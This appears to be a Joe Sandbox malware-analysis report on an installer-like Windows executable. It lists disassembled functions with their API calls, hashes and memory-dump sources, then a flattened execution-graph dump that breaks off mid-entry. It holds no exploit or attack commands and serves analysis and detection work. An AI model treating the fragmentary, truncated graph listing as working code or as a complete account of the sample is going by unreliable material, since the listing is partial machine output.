                                                                                                                                                                                                                                  Function 0042DD64 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                                                                                                                                                                                                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value$EnumQuery
                                                                                                                                                                                                                                  • String ID: Inno Setup: No Icons
                                                                                                                                                                                                                                  • API String ID: 1576479698-2016326496
                                                                                                                                                                                                                                  • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                                                                                                                                                                  • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00452E88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                                                                                                  • String ID: T$H
                                                                                                                                                                                                                                  • API String ID: 1799206407-488339322
                                                                                                                                                                                                                                  • Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                                                                                                                                                                  • Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00452E10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DirectoryErrorLastRemove
                                                                                                                                                                                                                                  • String ID: T$H
                                                                                                                                                                                                                                  • API String ID: 377330604-488339322
                                                                                                                                                                                                                                  • Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                                                                                                                                                                  • Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00498004 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(6E290000,00481A2F), ref: 0047D0E2
                                                                                                                                                                                                                                    • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
                                                                                                                                                                                                                                    • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Detected restart. Removing temporary directory., xrefs: 00498013
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                                                                                                                                                                  • String ID: Detected restart. Removing temporary directory.
                                                                                                                                                                                                                                  • API String ID: 1717587489-3199836293
                                                                                                                                                                                                                                  • Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                                                                                                                                                                  • Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00455674 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastSleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1458359878-0
                                                                                                                                                                                                                                  • Opcode ID: c5b77a215fef9e73284e25b888dd0379cf9cc52578839764909bbaa24cd021e3
                                                                                                                                                                                                                                  • Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5b77a215fef9e73284e25b888dd0379cf9cc52578839764909bbaa24cd021e3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:17%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:5.1%
                                                                                                                                                                                                                                  Total number of Nodes:1258
                                                                                                                                                                                                                                  Total number of Limit Nodes:24
                                                                                                                                                                                                                                  execution_graph 3293 403141 3296 407c08 3293->3296 3297 403155 FindCloseChangeNotification 3296->3297 3872 402541 3873 401456 18 API calls 3872->3873 3874 40254d 3873->3874 3875 401456 18 API calls 3874->3875 3876 40255c 3875->3876 3877 402578 EnableWindow 3876->3877 3878 40256d ShowWindow 3876->3878 3879 4037d4 3877->3879 3878->3879 3880 401e43 3881 401456 18 API calls 3880->3881 3882 401e4f 3881->3882 3883 401456 18 API calls 3882->3883 3884 401e5e 3883->3884 3885 401400 18 API calls 3884->3885 3886 401e71 3885->3886 3891 401ee6 3886->3891 3893 407cde lstrlenA 3886->3893 3894 408d43 3896 408a96 3894->3896 3895 408cf0 3896->3895 3897 408b69 GlobalAlloc 3896->3897 3898 408b4d GlobalFree 3896->3898 3899 408c55 GlobalAlloc 3896->3899 3900 408c45 GlobalFree 3896->3900 3897->3895 3897->3896 3898->3897 3899->3895 3899->3896 3900->3899 3901 405c44 3902 405c8f 3901->3902 3903 405c6f 3901->3903 3905 405c9c GetDlgItem 3902->3905 3908 405d60 3902->3908 3966 407805 GetDlgItemTextA 3903->3966 3907 405cbc 3905->3907 3906 405c7f 3909 407d37 5 API calls 3906->3909 3913 405cd7 SetWindowTextA 3907->3913 3918 407935 3 API calls 3907->3918 3910 405c89 3908->3910 3915 407e06 18 API calls 3908->3915 3909->3910 3911 4060cd 3910->3911 3972 407805 GetDlgItemTextA 3910->3972 3990 404f0f 3911->3990 3967 404d65 3913->3967 3920 405dd9 SHBrowseForFolderA 3915->3920 3916 405eb6 3921 40815b 17 API calls 3916->3921 3923 405cc9 3918->3923 3920->3910 3925 405dfa CoTaskMemFree 3920->3925 3926 405ec0 3921->3926 3923->3913 3930 407cf2 3 API calls 3923->3930 3928 407cf2 3 API calls 3925->3928 3973 407cb6 lstrcpynA 3926->3973 3932 405e0c 3928->3932 3934 405cd6 3930->3934 3936 405e65 3932->3936 3940 407e06 18 API calls 3932->3940 3933 405edb 3937 408299 5 API calls 3933->3937 3934->3913 3971 4077fb SetDlgItemTextA 3936->3971 3945 405ee9 3937->3945 3941 405e34 lstrcmpiA 3940->3941 3941->3936 3943 405e51 3941->3943 3942 405ef2 3974 407cb6 lstrcpynA 3942->3974 3970 407ce8 lstrcatA 3943->3970 3945->3942 3951 4078ce 2 API calls 3945->3951 3953 405f45 3945->3953 3947 405f02 3948 407935 3 API calls 3947->3948 3949 405f10 GetDiskFreeSpaceA 3948->3949 3952 405fb9 MulDiv 3949->3952 3949->3953 3951->3945 3952->3953 3954 406060 3953->3954 3975 404da2 3953->3975 3956 406099 3954->3956 3957 403903 2 API calls 3954->3957 3988 404d44 EnableWindow 3956->3988 3957->3956 3960 4060ba 3960->3911 3989 404d05 SendMessageA 3960->3989 3966->3906 3968 407e06 18 API calls 3967->3968 3969 404d8c 3968->3969 3972->3916 3973->3933 3974->3947 3976 404db5 3975->3976 3977 407e06 18 API calls 3976->3977 3978 404e3c 3977->3978 3979 407e06 18 API calls 3978->3979 3980 404e51 3979->3980 3981 407e06 18 API calls 3980->3981 3982 404e65 3981->3982 4004 407cde lstrlenA 3982->4004 3988->3960 3989->3911 3991 404f27 3990->3991 3992 404f2e GetWindowLongA 3990->3992 3992->3991 3993 404f4a 3992->3993 3994 404f52 GetSysColor 3993->3994 3995 404f5c 3993->3995 3994->3995 3996 404f71 SetBkMode 3995->3996 3997 404f62 SetTextColor 3995->3997 3998 404f9c 3996->3998 3999 404f8f GetSysColor 3996->3999 3997->3996 4000 404fa2 SetBkColor 3998->4000 4001 404fb4 3998->4001 3999->3998 4000->4001 4001->3991 4002 404fd1 CreateBrushIndirect 4001->4002 4003 404fc7 DeleteObject 4001->4003 4002->3991 4003->4002 4005 403747 4006 401456 18 API calls 4005->4006 4009 4036cd 4006->4009 4007 4037a0 4008 407e06 18 API calls 4007->4008 4010 402a3c 4007->4010 4008->4010 4009->4005 4009->4007 4009->4010 4011 404ec8 lstrcpynA 4014 407cde lstrlenA 4011->4014 4015 4023c9 GetDlgItem GetClientRect 4016 401400 18 API calls 4015->4016 4017 402419 LoadImageA SendMessageA 4016->4017 4018 40246e DeleteObject 4017->4018 4019 40382f 4017->4019 4018->4019 3838 402e4b 3839 402e51 3838->3839 3840 401400 18 API calls 3839->3840 3841 402e74 3840->3841 3842 401400 18 API calls 3841->3842 3843 402e87 RegCreateKeyExA 3842->3843 3844 402ee4 3843->3844 3847 403677 3843->3847 3845 402f06 3844->3845 3846 402ee9 3844->3846 3849 402f24 3845->3849 3850 402f0b 3845->3850 3848 401400 18 API calls 3846->3848 3851 402ef5 3848->3851 3853 402f54 RegSetValueExA 3849->3853 3857 403d52 46 API calls 3849->3857 3859 401456 3850->3859 3858 407cde lstrlenA 3851->3858 3854 40307b RegCloseKey 3853->3854 3854->3847 3856 402f02 3856->3853 3857->3856 3860 407e06 18 API calls 3859->3860 3861 401477 3860->3861 4020 404a4c 4021 404a5e 4020->4021 4022 404a68 GlobalAlloc 4021->4022 4023 404a86 4021->4023 4022->4023 4024 4033cf FindClose 4025 401f51 4026 401400 18 API calls 4025->4026 4027 401f5d ExpandEnvironmentStringsA 4026->4027 4028 401f8a 4027->4028 4030 401f7c 4027->4030 4029 401f97 lstrcmpA 4028->4029 4028->4030 4029->4030 3298 402853 3299 402869 3298->3299 3300 402970 3298->3300 3301 401400 18 API calls 3299->3301 3303 40163b 23 API calls 3300->3303 3302 402875 3301->3302 3304 401400 18 API calls 3302->3304 3305 402a3b 3303->3305 3306 402884 3304->3306 3307 402890 LoadLibraryExA 3306->3307 3308 4028b8 GetModuleHandleA 3306->3308 3307->3300 3309 4028b6 3307->3309 3308->3307 3310 4028c8 GetProcAddress 3308->3310 3309->3310 3311 40292d 3310->3311 3312 4028dd 3310->3312 3313 406fcb 23 API calls 3311->3313 3314 40163b 23 API calls 3312->3314 3315 4028ef 3312->3315 3313->3315 3314->3315 3315->3305 3316 402962 FreeLibrary 3315->3316 3316->3305 4031 4026d3 4032 401400 18 API calls 4031->4032 4033 4026df 4032->4033 4034 408123 2 API calls 4033->4034 4035 4026e8 4034->4035 4037 402704 4035->4037 4038 407be3 wsprintfA 4035->4038 4038->4037 4039 4016d4 4040 401cc4 4039->4040 4041 406fcb 23 API calls 4040->4041 4042 401cc9 4041->4042 4043 402bd6 4044 401400 18 API calls 4043->4044 4045 402be2 4044->4045 4046 401400 18 API calls 4045->4046 4047 402bf1 4046->4047 4048 401400 18 API calls 4047->4048 4049 402c00 4048->4049 4050 408123 2 API calls 4049->4050 4051 402c0b 4050->4051 4052 402c8d 4051->4052 4061 407cde lstrlenA 4051->4061 4054 406fcb 23 API calls 4052->4054 4058 402ca1 4054->4058 4069 406ed7 4070 406ef1 4069->4070 4071 406f0b 4069->4071 4070->4071 4072 406ef7 4070->4072 4073 406f13 IsWindowVisible 4071->4073 4079 406f31 4071->4079 4074 404bd7 SendMessageA 4072->4074 4075 406f21 4073->4075 4076 406f9d CallWindowProcA 4073->4076 4077 406f03 4074->4077 4088 406557 SendMessageA 4075->4088 4076->4077 4079->4076 4091 407cb6 lstrcpynA 4079->4091 4081 406f66 4092 407be3 wsprintfA 4081->4092 4083 406f78 4084 403903 2 API calls 4083->4084 4085 406f86 4084->4085 4093 407cb6 lstrcpynA 4085->4093 4087 406f9b 4087->4076 4089 4065db 4088->4089 4090 406595 GetMessagePos ScreenToClient SendMessageA 4088->4090 4089->4079 4090->4089 4091->4081 4092->4083 4093->4087 4094 4037d8 SendMessageA 4095 40380d InvalidateRect 4094->4095 4096 40382c 4094->4096 4095->4096 4104 40395e 4105 403973 SetTimer 4104->4105 4106 403999 4104->4106 4105->4106 4107 4039f0 4106->4107 4111 40392c MulDiv 4106->4111 4109 4039a5 wsprintfA SetWindowTextA 4112 4077fb SetDlgItemTextA 4109->4112 4111->4109 3183 401860 3202 401400 3183->3202 3187 401902 3188 401942 3187->3188 3189 40190e 3187->3189 3193 40163b 23 API calls 3188->3193 3198 403677 3188->3198 3228 40163b 3189->3228 3193->3198 3197 40192b SetCurrentDirectoryA 3197->3198 3199 4018dd GetFileAttributesA 3201 401879 3199->3201 3201->3187 3201->3199 3213 4078a4 3201->3213 3217 4082eb 3201->3217 3220 4076b0 CreateDirectoryA 3201->3220 3225 40774b CreateDirectoryA 3201->3225 3232 407e06 3202->3232 3205 40144b 3207 407935 CharNextA CharNextA 3205->3207 3208 40795a 3207->3208 3209 407976 3208->3209 3210 4078a4 CharNextA 3208->3210 3209->3201 3211 40798a 3210->3211 3211->3209 3212 4078a4 CharNextA 3211->3212 3212->3209 3214 4078b1 3213->3214 3215 4078c7 3214->3215 3216 4078bb CharNextA 3214->3216 3215->3201 3216->3214 3269 408299 GetModuleHandleA 3217->3269 3221 407710 3220->3221 3222 407714 GetLastError 3220->3222 3221->3201 3222->3221 3223 407723 SetFileSecurityA 3222->3223 3223->3221 3224 40773f GetLastError 3223->3224 3224->3221 3226 407775 3225->3226 3227 40776f GetLastError 3225->3227 3226->3201 3227->3226 3278 406fcb 3228->3278 3231 407cb6 lstrcpynA 3231->3197 3244 407e16 3232->3244 3233 407ef9 3234 40143a 3233->3234 3261 407cb6 lstrcpynA 3233->3261 3234->3205 3251 407d37 3234->3251 3236 407f25 GetVersion 3245 407f34 3236->3245 3237 407ee3 lstrlenA 3237->3244 3241 407fbb GetSystemDirectoryA 3241->3245 3242 407e06 11 API calls 3242->3244 3243 407fe1 GetWindowsDirectoryA 3243->3245 3244->3233 3244->3236 3244->3237 3244->3242 3246 407d37 5 API calls 3244->3246 3260 407be3 wsprintfA 3244->3260 3267 407cb6 lstrcpynA 3244->3267 3268 407ce8 lstrcatA 3244->3268 3245->3241 3245->3243 3245->3244 3247 407e06 11 API calls 3245->3247 3248 408002 SHGetSpecialFolderLocation 3245->3248 3262 407b3a RegOpenKeyExA 3245->3262 3246->3244 3247->3245 3248->3245 3249 408069 SHGetPathFromIDListA CoTaskMemFree 3248->3249 3249->3245 3252 407d48 3251->3252 3253 407dd5 3252->3253 3256 407dc7 CharNextA 3252->3256 3257 4078a4 CharNextA 3252->3257 3258 407d9c CharNextA 3252->3258 3259 407db8 CharNextA 3252->3259 3254 407dde CharPrevA 3253->3254 3255 407dfc 3253->3255 3254->3253 3255->3205 3256->3252 3257->3252 3258->3252 3259->3256 3260->3244 3261->3234 3263 407b81 RegQueryValueExA 3262->3263 3264 407bdc 3262->3264 3265 407bbc RegCloseKey 3263->3265 3264->3245 3265->3264 3267->3244 3270 4082bb 3269->3270 3271 4082cc GetProcAddress 3269->3271 3275 40820e GetSystemDirectoryA 3270->3275 3273 4082e2 3271->3273 3273->3201 3274 4082c3 3274->3271 3274->3273 3276 40823c wsprintfA LoadLibraryExA 3275->3276 3276->3274 3279 401654 3278->3279 3280 406fe2 3278->3280 3279->3231 3281 407002 3280->3281 3282 407e06 18 API calls 3280->3282 3292 407cde lstrlenA 3281->3292 3282->3281 4113 4020e0 4114 40216e 4113->4114 4120 4020f0 4113->4120 4115 4021a1 GlobalAlloc 4114->4115 4116 402172 4114->4116 4118 407e06 18 API calls 4115->4118 4123 402127 4116->4123 4134 407cb6 lstrcpynA 4116->4134 4117 402101 4121 407e06 18 API calls 4117->4121 4118->4123 4120->4117 4124 40212e 4120->4124 4125 402115 4121->4125 4122 402189 GlobalFree 4122->4123 4132 407cb6 lstrcpynA 4124->4132 4128 407836 MessageBoxIndirectA 4125->4128 4127 402141 4133 407cb6 lstrcpynA 4127->4133 4128->4123 4130 402157 4135 407cb6 lstrcpynA 4130->4135 4132->4127 4133->4130 4134->4122 4135->4123 4136 4021e3 4137 401456 18 API calls 4136->4137 4138 4021ef 4137->4138 4139 401456 18 API calls 4138->4139 4140 4021fe 4139->4140 4141 402216 4140->4141 4142 401400 18 API calls 4140->4142 4143 401400 18 API calls 4141->4143 4147 40222e 4141->4147 4142->4141 4143->4147 4144 402245 4148 401456 18 API calls 4144->4148 4145 4022c6 4146 401400 18 API calls 4145->4146 4150 4022cb 4146->4150 4147->4144 4147->4145 4149 40224a 4148->4149 4151 401456 18 API calls 4149->4151 4152 401400 18 API calls 4150->4152 4153 40225d 4151->4153 4154 4022de FindWindowExA 4152->4154 4155 4022a9 SendMessageA 4153->4155 4156 402269 SendMessageTimeoutA 4153->4156 4158 402308 4154->4158 4155->4158 4156->4158 4157 402332 4158->4157 4160 407be3 wsprintfA 4158->4160 4160->4157 3341 403164 3342 401400 18 API calls 3341->3342 3343 403170 3342->3343 3348 407a78 GetFileAttributesA CreateFileA 3343->3348 3345 402530 3347 40253c 3345->3347 3349 407be3 wsprintfA 3345->3349 3348->3345 3349->3347 3784 401ae6 3785 401400 18 API calls 3784->3785 3786 401af2 3785->3786 3787 401aff 3786->3787 3788 407ad4 2 API calls 3786->3788 3788->3787 4161 401968 4162 401400 18 API calls 4161->4162 4163 401974 4162->4163 4164 401400 18 API calls 4163->4164 4165 401983 4164->4165 4166 401400 18 API calls 4165->4166 4167 401992 MoveFileA 4166->4167 4168 4019b2 4167->4168 4169 4019a6 4167->4169 4170 408123 2 API calls 4168->4170 4173 402a3c 4168->4173 4171 40163b 23 API calls 4169->4171 4169->4173 4172 4019c7 4170->4172 4171->4173 4172->4173 4174 408311 39 API calls 4172->4174 4174->4169 4175 40236a 4176 401456 18 API calls 4175->4176 4177 402376 4176->4177 4178 401456 18 API calls 4177->4178 4179 402385 GetDlgItem 4178->4179 4180 402530 4179->4180 4183 407be3 wsprintfA 4180->4183 4182 40253c 4183->4182 4184 4019ea 4185 401400 18 API calls 4184->4185 4186 4019f6 GetFullPathNameA 4185->4186 4187 401a25 4186->4187 4193 401a58 4186->4193 4189 408123 2 API calls 4187->4189 4187->4193 4188 401a7b GetShortPathNameA 4190 403831 4188->4190 4191 401a3e 4189->4191 4191->4193 4194 407cb6 lstrcpynA 4191->4194 4193->4188 4193->4190 4194->4193 4195 404fed 4196 405013 4195->4196 4197 405007 4195->4197 4198 405025 GetDlgItem GetDlgItem 4196->4198 4208 40509d 4196->4208 4197->4196 4199 40555f 4197->4199 4200 404d65 18 API calls 4198->4200 4202 405564 SetWindowPos 4199->4202 4203 4055a6 4199->4203 4206 405071 SetClassLongA 4200->4206 4201 4050c1 4207 404bd7 SendMessageA 4201->4207 4218 405134 4201->4218 4231 4056a8 4202->4231 4204 4055ab ShowWindow 4203->4204 4205 4055cf 4203->4205 4204->4231 4209 4055f1 4205->4209 4210 4055d7 DestroyWindow 4205->4210 4211 403903 2 API calls 4206->4211 4247 4050cd 4207->4247 4208->4201 4212 403845 2 API calls 4208->4212 4215 4055f6 SetWindowLongA 4209->4215 4216 40561c 4209->4216 4214 4053e3 4210->4214 4211->4208 4217 4050ef 4212->4217 4213 404f0f 8 API calls 4213->4218 4214->4218 4225 40553d ShowWindow 4214->4225 4215->4218 4219 405628 GetDlgItem 4216->4219 4216->4231 4217->4201 4220 4050f5 SendMessageA 4217->4220 4223 405650 SendMessageA IsWindowEnabled 4219->4223 4224 405641 4219->4224 4220->4218 4221 40537a DestroyWindow EndDialog 4221->4214 4222 403903 2 API calls 4222->4247 4223->4218 4223->4224 4227 405693 4224->4227 4229 4056b1 4224->4229 4230 4056f7 SendMessageA 4224->4230 4237 405647 4224->4237 4225->4218 4226 407e06 18 API calls 4226->4247 4227->4230 4227->4237 4232 4056d3 4229->4232 4233 4056ba 4229->4233 4230->4231 4231->4213 4236 403903 2 API calls 4232->4236 4235 403903 2 API calls 4233->4235 4234 404d65 18 API calls 4234->4247 4235->4237 4236->4237 4237->4231 4264 404cc8 4237->4264 4238 404d65 18 API calls 4239 4051bc GetDlgItem 4238->4239 4240 4051e7 ShowWindow 4239->4240 4239->4247 4240->4247 4242 40525a EnableMenuItem SendMessageA 4243 4052af SendMessageA 4242->4243 4242->4247 4243->4247 4246 4053c8 DestroyWindow 4246->4214 4248 405407 CreateDialogParamA 4246->4248 4247->4218 4247->4221 4247->4222 4247->4226 4247->4234 4247->4238 4247->4240 4247->4242 4247->4246 4253 407e06 18 API calls 4247->4253 4260 404d44 EnableWindow 4247->4260 4261 404c96 SendMessageA 4247->4261 4262 407cb6 lstrcpynA 4247->4262 4263 407cde lstrlenA 4247->4263 4248->4214 4249 405448 4248->4249 4251 404d65 18 API calls 4249->4251 4252 40545f GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4251->4252 4254 403845 2 API calls 4252->4254 4255 405314 SetWindowTextA 4253->4255 4257 4054ee 4254->4257 4256 403845 2 API calls 4255->4256 4256->4247 4257->4218 4258 4054fd ShowWindow 4257->4258 4259 404bd7 SendMessageA 4258->4259 4259->4214 4260->4247 4261->4247 4262->4247 4265 404cd6 4264->4265 4266 404cdc SendMessageA 4264->4266 4265->4266 4266->4231 4267 401771 SetForegroundWindow 4268 40219b 4267->4268 4269 4033f2 4270 403401 4269->4270 4273 40345f 4269->4273 4271 40340f FindNextFileA 4270->4271 4272 403429 4271->4272 4271->4273 4272->4273 4275 407cb6 